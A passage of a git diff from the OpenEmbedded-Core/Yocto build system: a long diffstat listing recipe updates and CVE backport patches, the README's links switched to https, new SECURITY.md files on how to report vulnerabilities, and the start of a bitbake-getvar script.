-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch214
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch60
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb14
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb1
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch33
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb19
-rw-r--r--meta/recipes-multimedia/lame/lame_3.100.bb3
-rw-r--r--meta/recipes-multimedia/liba52/liba52_0.7.4.bb3
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch21
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb1
-rw-r--r--meta/recipes-multimedia/libpng/files/run-ptest29
-rw-r--r--meta/recipes-multimedia/libpng/libpng_1.6.37.bb18
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch13
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb2
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch36
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch44
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch30
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch46
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb9
-rw-r--r--meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch52
-rw-r--r--meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch148
-rw-r--r--meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch27
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch119
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch55
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch42
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch36
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch39
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch217
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch37
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch58
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch183
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch159
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch29
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch659
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch123
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch277
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch45
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch548
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch26
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch157
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch135
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch91
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch173
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch90
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch33
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch59
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch47
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch67
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch53
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch191
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch152
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch46
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch28
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch212
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch62
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/tiff_4.1.0.bb53
-rw-r--r--meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb6
-rw-r--r--meta/recipes-multimedia/pulseaudio/pulseaudio.inc2
-rw-r--r--meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch30
-rw-r--r--meta/recipes-multimedia/speex/speex_1.2.0.bb4
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-1999.patch55
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch366
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch53
-rw-r--r--meta/recipes-multimedia/webp/libwebp_1.1.0.bb6
-rw-r--r--meta/recipes-multimedia/x264/x264_git.bb2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests.inc2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests_1.1.bb3
-rw-r--r--meta/recipes-sato/images/core-image-sato-dev.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato-ptest-fast.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk-ptest.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato.bb2
-rw-r--r--meta/recipes-sato/l3afpad/l3afpad_git.bb6
-rw-r--r--meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb3
-rw-r--r--meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb1
-rw-r--r--meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb4
-rw-r--r--meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb2
-rw-r--r--meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb2
-rw-r--r--meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb1
-rw-r--r--meta/recipes-sato/puzzles/puzzles_git.bb3
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc1
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch30
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb4
-rw-r--r--meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb2
-rw-r--r--meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb2
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch31
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch66
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch15
-rw-r--r--meta/recipes-sato/webkit/webkitgtk_2.28.4.bb (renamed from meta/recipes-sato/webkit/webkitgtk_2.28.2.bb)6
-rw-r--r--meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch135
-rw-r--r--meta/recipes-support/apr/apr-util_1.6.3.bb (renamed from meta/recipes-support/apr/apr-util_1.6.1.bb)8
-rw-r--r--meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch20
-rw-r--r--meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch58
-rw-r--r--meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch25
-rw-r--r--meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch63
-rw-r--r--meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch76
-rw-r--r--meta/recipes-support/apr/apr/libtoolize_check.patch21
-rw-r--r--meta/recipes-support/apr/apr_1.7.2.bb (renamed from meta/recipes-support/apr/apr_1.7.0.bb)31
-rw-r--r--meta/recipes-support/argp-standalone/argp-standalone_1.3.bb1
-rw-r--r--meta/recipes-support/aspell/aspell_0.60.8.bb17
-rw-r--r--meta/recipes-support/aspell/files/CVE-2019-25051.patch101
-rw-r--r--meta/recipes-support/atk/at-spi2-atk_2.34.1.bb2
-rw-r--r--meta/recipes-support/atk/at-spi2-core_2.34.0.bb6
-rw-r--r--meta/recipes-support/atk/atk_2.34.1.bb1
-rw-r--r--meta/recipes-support/attr/acl_2.2.53.bb5
-rw-r--r--meta/recipes-support/attr/attr.inc6
-rw-r--r--meta/recipes-support/bash-completion/bash-completion_2.10.bb7
-rw-r--r--meta/recipes-support/bmap-tools/bmap-tools_3.5.bb2
-rw-r--r--meta/recipes-support/boost/boost-1.72.0.inc2
-rw-r--r--meta/recipes-support/boost/boost.inc6
-rw-r--r--meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch32
-rw-r--r--meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch24
-rw-r--r--meta/recipes-support/boost/boost_1.72.0.bb2
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch80
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch20
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch34
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates_20211016.bb (renamed from meta/recipes-support/ca-certificates/ca-certificates_20210119.bb)13
-rw-r--r--meta/recipes-support/consolekit/consolekit_0.4.6.bb2
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22876.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22890.patch464
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22898.patch26
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22924.patch226
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22925.patch43
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946.patch328
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22947.patch352
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-22576.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-1.patch45
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-2.patch80
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-3.patch83
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-4.patch35
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27775.patch39
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27776.patch114
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27781.patch46
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-1.patch363
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-2.patch71
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32206.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32207.patch284
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32208.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32221.patch29
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35252.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35260.patch68
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-43552.patch82
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-23916.patch231
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27533.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch51
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534.patch33
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch236
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535.patch170
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27536.patch55
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27538.patch31
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch197
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28321.patch272
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28322.patch380
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-32001.patch38
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38545.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38546.patch132
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-46218.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2024-2398.patch88
-rw-r--r--meta/recipes-support/curl/curl_7.69.1.bb55
-rw-r--r--meta/recipes-support/db/db_5.3.28.bb3
-rw-r--r--meta/recipes-support/debianutils/debianutils_4.9.1.bb5
-rw-r--r--meta/recipes-support/diffoscope/diffoscope_172.bb (renamed from meta/recipes-support/diffoscope/diffoscope_136.bb)11
-rw-r--r--meta/recipes-support/dos2unix/dos2unix_7.4.1.bb2
-rw-r--r--meta/recipes-support/enchant/enchant2_2.2.8.bb3
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch50
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch31
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch30
-rw-r--r--meta/recipes-support/fribidi/fribidi_1.0.9.bb9
-rw-r--r--meta/recipes-support/gdbm/gdbm_1.18.1.bb3
-rw-r--r--meta/recipes-support/gmp/gmp/cve-2021-43618.patch27
-rw-r--r--meta/recipes-support/gmp/gmp_6.2.0.bb1
-rw-r--r--meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch24
-rw-r--r--meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch44
-rw-r--r--meta/recipes-support/gnupg/gnupg/relocate.patch20
-rw-r--r--meta/recipes-support/gnupg/gnupg_2.2.27.bb (renamed from meta/recipes-support/gnupg/gnupg_2.2.20.bb)10
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch67
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch65
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch37
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch282
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch85
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch206
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch125
-rw-r--r--meta/recipes-support/gnutls/gnutls_3.6.14.bb11
-rw-r--r--meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch45
-rw-r--r--meta/recipes-support/gnutls/libtasn1_4.16.0.bb3
-rw-r--r--meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch24
-rw-r--r--meta/recipes-support/gpgme/gpgme_1.13.1.bb3
-rw-r--r--meta/recipes-support/iso-codes/iso-codes_4.4.bb5
-rw-r--r--meta/recipes-support/itstool/itstool_2.0.6.bb4
-rw-r--r--meta/recipes-support/libassuan/libassuan_2.5.3.bb3
-rw-r--r--meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb1
-rw-r--r--meta/recipes-support/libbsd/libbsd_0.10.0.bb6
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2602.patch52
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2603.patch58
-rw-r--r--meta/recipes-support/libcap/libcap_2.32.bb8
-rw-r--r--meta/recipes-support/libcheck/libcheck_0.14.0.bb5
-rw-r--r--meta/recipes-support/libcroco/libcroco_0.6.13.bb3
-rw-r--r--meta/recipes-support/libdaemon/libdaemon_0.14.bb4
-rw-r--r--meta/recipes-support/libevdev/libevdev/determinism.patch3
-rw-r--r--meta/recipes-support/libevdev/libevdev_1.8.0.bb3
-rw-r--r--meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch33
-rw-r--r--meta/recipes-support/libevent/libevent_2.1.11.bb6
-rw-r--r--meta/recipes-support/libexif/libexif_0.6.22.bb3
-rw-r--r--meta/recipes-support/libfm/libfm-extra_1.3.1.bb1
-rw-r--r--meta/recipes-support/libfm/libfm_1.3.1.bb2
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch77
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch109
-rw-r--r--meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb5
-rw-r--r--meta/recipes-support/libgpg-error/libgpg-error_1.37.bb1
-rw-r--r--meta/recipes-support/libical/libical_3.0.7.bb4
-rw-r--r--meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb2
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-3515.patch47
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-47629.patch69
-rw-r--r--meta/recipes-support/libksba/libksba_1.3.5.bb10
-rw-r--r--meta/recipes-support/libnl/libnl_3.5.0.bb5
-rw-r--r--meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch41
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch30
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch59
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch660
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch74
-rw-r--r--meta/recipes-support/libpcre/libpcre2_10.34.bb6
-rw-r--r--meta/recipes-support/libpcre/libpcre_8.44.bb3
-rw-r--r--meta/recipes-support/libproxy/libproxy_0.4.15.bb4
-rw-r--r--meta/recipes-support/libpsl/libpsl_0.21.0.bb13
-rw-r--r--meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb4
-rw-r--r--meta/recipes-support/libunistring/libunistring_0.9.10.bb1
-rw-r--r--meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch420
-rw-r--r--meta/recipes-support/libunwind/libunwind_1.3.1.bb1
-rw-r--r--meta/recipes-support/liburcu/liburcu_0.11.1.bb3
-rw-r--r--meta/recipes-support/libusb/libusb1_1.0.22.bb6
-rw-r--r--meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch201
-rw-r--r--meta/recipes-support/libxslt/libxslt_1.1.34.bb10
-rw-r--r--meta/recipes-support/lz4/files/CVE-2021-3520.patch27
-rw-r--r--meta/recipes-support/lz4/lz4_1.9.2.bb10
-rw-r--r--meta/recipes-support/lzo/lzo_2.10.bb4
-rw-r--r--meta/recipes-support/lzop/lzop_1.04.bb1
-rw-r--r--meta/recipes-support/mpfr/mpfr_4.0.2.bb1
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch215
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch122
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch48
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch277
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch163
-rw-r--r--meta/recipes-support/nettle/nettle_3.5.1.bb8
-rw-r--r--meta/recipes-support/npth/npth_1.6.bb1
-rw-r--r--meta/recipes-support/p11-kit/p11-kit_0.23.22.bb4
-rw-r--r--meta/recipes-support/popt/popt_1.16.bb1
-rw-r--r--meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb4
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch347
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch243
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch156
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch166
-rw-r--r--meta/recipes-support/re2c/re2c_1.0.1.bb10
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/rngd.service1
-rw-r--r--meta/recipes-support/rng-tools/rng-tools_6.9.bb2
-rw-r--r--meta/recipes-support/serf/serf_1.3.9.bb5
-rw-r--r--meta/recipes-support/shared-mime-info/shared-mime-info_git.bb3
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35525.patch21
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35527.patch22
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2021-20223.patch23
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2022-35737.patch29
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2023-7104.patch46
-rw-r--r--meta/recipes-support/sqlite/sqlite3.inc1
-rw-r--r--meta/recipes-support/sqlite/sqlite3_3.31.1.bb5
-rw-r--r--meta/recipes-support/taglib/taglib_1.11.1.bb1
-rw-r--r--meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch13
-rw-r--r--meta/recipes-support/vim/files/disable_acl_header_check.patch15
-rw-r--r--meta/recipes-support/vim/files/no-path-adjust.patch8
-rw-r--r--meta/recipes-support/vim/files/racefix.patch33
-rw-r--r--meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch13
-rw-r--r--meta/recipes-support/vim/vim-tiny_9.0.bb (renamed from meta/recipes-support/vim/vim-tiny_8.2.bb)0
-rw-r--r--meta/recipes-support/vim/vim.inc48
-rw-r--r--meta/recipes-support/vim/vim_9.0.bb (renamed from meta/recipes-support/vim/vim_8.2.bb)0
-rw-r--r--meta/recipes-support/vte/vte_0.58.3.bb2
-rwxr-xr-xscripts/bitbake-whatchanged2
-rwxr-xr-xscripts/buildhistory-diff5
-rwxr-xr-xscripts/contrib/build-perf-test-wrapper.sh15
-rwxr-xr-xscripts/contrib/convert-srcuri.py77
-rwxr-xr-xscripts/contrib/documentation-audit.sh2
-rwxr-xr-xscripts/contrib/oe-build-perf-report-email.py167
-rwxr-xr-xscripts/create-pull-request2
-rwxr-xr-xscripts/git26
-rw-r--r--scripts/lib/buildstats.py4
-rw-r--r--scripts/lib/checklayer/__init__.py11
-rw-r--r--scripts/lib/checklayer/cases/common.py2
-rw-r--r--scripts/lib/devtool/deploy.py12
-rw-r--r--scripts/lib/devtool/menuconfig.py2
-rw-r--r--scripts/lib/devtool/standard.py9
-rw-r--r--scripts/lib/recipetool/create.py18
-rw-r--r--scripts/lib/resulttool/report.py5
-rw-r--r--scripts/lib/resulttool/resultutils.py8
-rw-r--r--scripts/lib/scriptutils.py10
-rw-r--r--scripts/lib/wic/engine.py6
-rw-r--r--scripts/lib/wic/help.py4
-rw-r--r--scripts/lib/wic/misc.py17
-rw-r--r--scripts/lib/wic/partition.py40
-rw-r--r--scripts/lib/wic/pluginbase.py8
-rw-r--r--scripts/lib/wic/plugins/imager/direct.py2
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-efi.py7
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-pcbios.py6
-rwxr-xr-xscripts/nativesdk-intercept/chgrp27
-rwxr-xr-xscripts/nativesdk-intercept/chown27
-rwxr-xr-xscripts/oe-depends-dot21
-rwxr-xr-xscripts/oe-pkgdata-browser2
-rwxr-xr-xscripts/oe-setup-builddir4
-rw-r--r--scripts/pybootchartgui/pybootchartgui/draw.py7
-rw-r--r--scripts/pybootchartgui/pybootchartgui/parsing.py2
-rwxr-xr-xscripts/relocate_sdk.py10
-rwxr-xr-xscripts/runqemu55
-rwxr-xr-xscripts/verify-bashisms2
-rwxr-xr-xscripts/wic6
-rwxr-xr-xscripts/yocto-check-layer28
1704 files changed, 120966 insertions, 7558 deletions
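--- a/README.OE-Core
+++ b/README.OE-Core
@@ -6,24 +6,24 @@ of OpenEmbedded. It is distro-less (can build a functional image with
 DISTRO = "nodistro") and contains only emulated machine support.
 
 For information about OpenEmbedded, see the OpenEmbedded website:
- http://www.openembedded.org/
+ https://www.openembedded.org/
 
 The Yocto Project has extensive documentation about OE including a reference manual
 which can be found at:
- http://yoctoproject.org/documentation
+ https://docs.yoctoproject.org/
 
 
 Contributing
 ------------
 
 Please refer to
-http://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
+https://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
 for guidelines on how to submit patches.
 
 Mailing list:
 
- http://lists.openembedded.org/mailman/listinfo/openembedded-core
+ https://lists.openembedded.org/g/openembedded-core
 
 Source code:
 
- http://git.openembedded.org/openembedded-core/
+ https://git.openembedded.org/openembedded-core/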
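--- /dev/null
+++ b/SECURITY.md
@@ -0,0 +1,24 @@
+How to Report a Potential Vulnerability?
+========================================
+
+If you would like to report a public issue (for example, one with a released
+CVE number), please report it using the
+[https://bugzilla.yoctoproject.org/enter_bug.cgi?product=Security Security Bugzilla].
+If you have a patch ready, submit it following the same procedure as any other
+patch as described in README.md.
+
+If you are dealing with a not-yet released or urgent issue, please send a
+message to security AT yoctoproject DOT org, including as many details as
+possible: the layer or software module affected, the recipe and its version,
+and any example code, if available.
+
+Branches maintained with security fixes
+---------------------------------------
+
+See [https://wiki.yoctoproject.org/wiki/Stable_Release_and_LTS Stable release and LTS]
+for detailed info regarding the policies and maintenance of Stable branches.
+
+The [https://wiki.yoctoproject.org/wiki/Releases Release page] contains a list of all
+releases of the Yocto Project. Versions in grey are no longer actively maintained with
+security patches, but well-tested patches may still be accepted for them for
+significant issues.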
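--- /dev/null
+++ b/bitbake/SECURITY.md
@@ -0,0 +1,24 @@
+How to Report a Potential Vulnerability?
+========================================
+
+If you would like to report a public issue (for example, one with a released
+CVE number), please report it using the
+[https://bugzilla.yoctoproject.org/enter_bug.cgi?product=Security Security Bugzilla].
+If you have a patch ready, submit it following the same procedure as any other
+patch as described in README.md.
+
+If you are dealing with a not-yet released or urgent issue, please send a
+message to security AT yoctoproject DOT org, including as many details as
+possible: the layer or software module affected, the recipe and its version,
+and any example code, if available.
+
+Branches maintained with security fixes
+---------------------------------------
+
+See [https://wiki.yoctoproject.org/wiki/Stable_Release_and_LTS Stable release and LTS]
+for detailed info regarding the policies and maintenance of Stable branches.
+
+The [https://wiki.yoctoproject.org/wiki/Releases Release page] contains a list of all
+releases of the Yocto Project. Versions in grey are no longer actively maintained with
+security patches, but well-tested patches may still be accepted for them for
+significant issues.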
diff --git a/bitbake/bin/bitbake-getvar b/bitbake/bin/bitbake-getvar
new file mode 100755
index 0000000000..9423219253
--- /dev/null
+++ b/bitbake/bin/bitbake-getvar
@@ -0,0 +1,48 @@
1#! /usr/bin/env python3
2#
3# Copyright (C) 2021 Richard Purdie
4#
5# SPDX-License-Identifier: GPL-2.0-only
6#
7
8import argparse
9import io
10import os
11import sys
12
13bindir = os.path.dirname(__file__)
14topdir = os.path.dirname(bindir)
15sys.path[0:0] = [os.path.join(topdir, 'lib')]
16
17import bb.tinfoil
18
19if __name__ == "__main__":
20 parser = argparse.ArgumentParser(description="Bitbake Query Variable")
21 parser.add_argument("variable", help="variable name to query")
22 parser.add_argument("-r", "--recipe", help="Recipe name to query", default=None, required=False)
